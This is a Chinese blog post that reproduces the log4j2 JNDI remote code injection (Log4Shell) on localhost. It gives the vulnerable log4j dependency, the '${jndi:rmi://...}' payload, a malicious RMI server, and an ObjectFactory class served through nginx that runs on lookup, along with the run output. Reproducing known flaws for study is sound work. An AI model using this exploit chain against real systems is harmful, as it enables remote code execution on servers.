log4j2 远程代码注入漏洞1 demo

已于 2023-03-08 17:08:19 修改
阅读量3.8k 收藏
点赞数 2
文章标签: java 安全漏洞
于 2021-12-22 17:46:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42710740/article/details/122090752
版权

网上已经有大量的资料讲解了漏洞的原因和发展过程,我主要写实现过程  

所以在jdk>1.8.0_181 时除非用户自己开启了com.sun.jndi.rmi.object.trustURLCodebase配置,否则漏洞是无法通过rmi来实现的,但是这也并不是说jdk>1.8.0_181 就不用担心这个漏洞,因为还可以使用ldap。

本篇主要将rmi的实现方式

依赖:

     <!--log4j 版本< 2.15即可 -->
<dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.12.1</version>
      </dependency>
      <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.12.1</version>
      </dependency>

log4j2.xml  放在resources 目录下

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
    <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{YYYY-MM-dd HH:mm:ss} [%t] %-5p %c{1}:%L - %msg%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="Console" />
        </Root>
    </Loggers>
</Configuration>

日志打印demo

bug是否能复现与jdk 有关,在jdk1.8要开启

 com.sun.jndi.rmi.object.trustURLCodebase 才可以复现bug

所以在jdk>1.8.0_181 时除非用户自己开启了配置否则bug是无法实现的

如果想不开启此配置复现bug请看这篇

log4j2 远程代码注入漏洞2 demo_灵耀的博客-CSDN博客

复现开始

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jDemo {
    private static final Logger LOGGER = LogManager.getLogger();

    public Log4jDemo() {
    }

    public static void main(String[] args) {
            
        //jdk1.8 默认关闭了这个配置
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        //System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

        try {
            String name = "${jndi:rmi://127.0.0.1:1099/test}";
            LOGGER.info("Hello test,{}", name);
        } catch (Exception var3) {
        }

    }
}

RMI

RMI 是远程方法调用协议 

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;

public class RMIServer {
    public RMIServer() {
    }

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("Local Registry RMI in 1099");
            // 类名 和类的全名  和nginx地址
            Reference reference = new Reference("Test", "xxx.Test", "http://127.0.0.1:80/");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("test", referenceWrapper);
        } catch (Exception var4) {
            var4.printStackTrace();
        }

    }
}

Test 类

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class Test implements ObjectFactory {




    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        System.out.println("--------被注入代码了--------");
        return null;
    }

}

将Test类编译好后连同包名复制到nginx 文件目录下

nignx下载地址 nginx: download

 解压后  使用 start nginx.exe 命令启动即可

验证nginx 是否启动成功  浏览器输入  http://127.0.0.1:80/

 nginx 使用默认配置即可 config/nginx.conf

 将class文件连同包复制到html目录下即可

 

 先启动RMIService  再启动 Log4jDemo  

运行结果

10:47:57.601 [main] INFO  com.mikeal.kafkatest.Log4jDemo - tanjunchen
10:47:57.601 [main] INFO  com.mikeal.kafkatest.Log4jDemo - tanjunchen Windows 10 10.0, architecture: amd64-64
-----代码被注入了-------
10:47:57.601 [main] INFO  com.mikeal.kafkatest.Log4jDemo - Hello attack,${jndi:rmi://127.0.0.1:1099/test}

Process finished with exit code 0

灵耀
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Themeleaf Nginx Logback Log4j2 Hibernate ApacheServer Hive Freemarker Flume 中文文档
07-28
'Apache Flume 1.9.0 中文文档.epub' 'Log4j2 中文文档.epub' 'Apache FreeMarker 2.3.28 中文文档.epub' 'Logback 1.3.0-alpha4 中文文档.epub' 'Apache Hive 3.1.1 中文文档.epub' 'Nginx 中文文档.epub' 'Apache Server 2.4 中文文档.epub' 'Thymeleaf 3.0 中文文档.epub' 'Hibernate 5.4 中文文档.epub'
log4j2 远程代码注入漏洞 JNDI + LDAP demo
weixin_42710740的博客
12-24 576
log4j2 远程代码注入漏洞 JNDI + RMI demo_灵耀的博客-CSDN博客 中讲述了 第一种实现方式但是需要添加 配置,下面这种方式不需要添加配置 依赖 <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId>
Log4j2的JNDI注入漏洞原理分析与思考,java面试线程池
最新发布
uftdv17136的博客
03-29 993
这个月马上就又要过去了,还在找工作的小伙伴要做好准备了,小编整理了大厂java程序员面试涉及到的绝大部分面试题及答案,希望能帮助到大家既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新如果你觉得这些内容对你有帮助,可以添加V获取:vip1024b (备注Java
Apache Log4j 远程代码注入漏洞
tanjunchen的博客
12-11 5563
漏洞说明 2021年12月9日,Apache Log4j2 Java 日志模块存在远程命令执行漏洞可直接控制目标服务器问题,攻击者攻击难度极低。由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。该漏洞可通过 critical、error、warining、notice、info、debug等日志级别触发,只需部分日志内容可控,此漏洞波及大量开源组件,包括 ELK、 Apache 、Struts2、Apache Solr、Apache Druid、A
log4j2远程代码执行漏洞 nginx接入层限制
lzw_me
12-13 3221
naxsi_core.rules配置 naxsi_mysite.rules 配置 重启nginx 完成。
五个demo案例带你学习PHP反序列化漏洞
weixin_30386713的博客
05-25 221
    一直想研究下php反序列化漏洞,花了几天时间做了个简单的了解。。写篇文章记录下。     直白点就是围绕着serialize和unserialize两个函数。     一个用于序列化,一个用于反序列化。     我们通常把字符串/数组/对象进行序列化,然后再反序列化被序列化的字符串/数组/对象   简单写个demo1.php    <?php $a="tes...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Log4J2远程代码执行漏洞修复20211210.rar
12-13
log4j-api-2.15.0.jar log4j-core-2.15.0.jar log4j-jcl-2.15.0.jar
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
老生常谈Log4jLog4j2的区别(推荐)
08-30
下面小编就为大家带来老生常谈Log4jLog4j2的区别(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
手动启动log4j|nginx实现http https共存
03-17 149
手动加载log4j.xml文件 DOMConfigurator.configure("src/main/resources/log4j.xml"); log4j.properties文件 PropertyConfigurator.configure("src/main/resources/conf/log4j.properties"); nginx配置ssl证书实现htt...
log4j配置nginx做logstash的tcp反向代理
七月流星
08-09 1046
1、配置nginx,当然我用的是windows 模拟的,nginx版本需要大于1.9,监听14330端口 worker_processes 1; events { worker_connections 1024; } stream { upstream backend { server 192.168.95.150:4560; ...
关于在nginx负载均衡下,项目共用log4j配置导致的日志混乱问题
幽灵笔记
06-29 1319
自定义Log4j Appender在开发-运维时遇到一个这样的问题: 用nginx负载均衡代理了几个项目,每个项目用的log4j的配置文件是一样的。本以为不会有影响,但是在之后运维时,发现打印出来日志不仅漏而且还把时间错位了。然后以为自己写错了什么,网上一搜,找到下面这位博主的文章。 nginx中使用log4j的漏日志问题上面的博主提供了一种解决方案。这里我写一个自己的~~ 1.自定义一个Ap
nginx中使用log4j的漏日志问题
weixin_30677073的博客
02-10 549
【背景】 前段时间在工作中发现,在nginx的自定义模块中使用log4j打印日志时,出现丢失日志&日志打印的日期混乱的问题。于是决定查查。 【现象】 配置: 1)在log4j配置文件中设置的按天切割文件,由于有多个进程,每个进程都读同样的配置,写同样的日志文件。 2)nginx配置12个进程 现象: ...
Log4j2漏洞复现
一名假人的博客
12-14 8337
Log4j2漏洞复现 一、前言 最近Log4j2漏洞算是刷屏了。博主也就跟风学习了一下,虽不说开发能力有啥提升,但是也算是学了点知识吧。这次就分享一下Log4j2漏洞的复现场景,以供大家参考。 二、参考文章 Apache Log4j2远程代码执行漏洞 本文的示例也都是按照这里面敲的,文章还有很多大佬评论大家可以多看看 三、漏洞触发流程图 这里使用LDAP服务进行演示 解释:Web服务为受害者对象,LDAP和HTTP服务为攻击者对象。 一句话概括:攻击者利用log4j2的JNDI技术发送恶意请求,使
Apache Log4j2远程代码执行漏洞排查及修复手册
宏伟
12-31 3291
https://www.cnvd.org.cn/webinfo/show/7146
阿里云被工信部暂停合作!Log4j 持续爆雷,啥时候是个头?
民工哥的博客
12-23 1885
点击关注公众号,回复“1024”获取2TB学习资源!作者 | 褚杏娟 核子可乐来源:infoQ据媒体报道,近期工信部网络安全管理局通报称,阿里云计算有限公司(以下称:阿里云)在 11 月...
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区为用户提供了相关工具。这些工具可以扫描用户的服务器和应用程序,检测是否受到Apache Log4j2远程代码执行漏洞的威胁。 这些工具通常会发送特定的请求来触发漏洞,并检查服务器的日志文件或响应,以确定是否存在漏洞。如果漏洞存在,工具将提供警告或报告,并建议相应的修复措施。 除了工具之外,用户还可以手动检查漏洞。他们可以通过编辑Log4j2的配置文件,将关键性日志记录功能设置为丢失或关闭。关闭该功能可以阻止攻击者利用漏洞,但也可能导致一些日志记录功能的失效。 为了更好地保护服务器和应用程序,用户应该尽快更新Apache Log4j2到最新版本。此外,他们还应该保持注意,及时关注安全更新和公告,并及时采取相应措施。 总之,Apache Log4j2远程代码执行漏洞检测工具是一种帮助用户发现漏洞并提供修复建议的工具。用户可以使用这些工具进行定期扫描,发现并处理潜在的漏洞,以提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值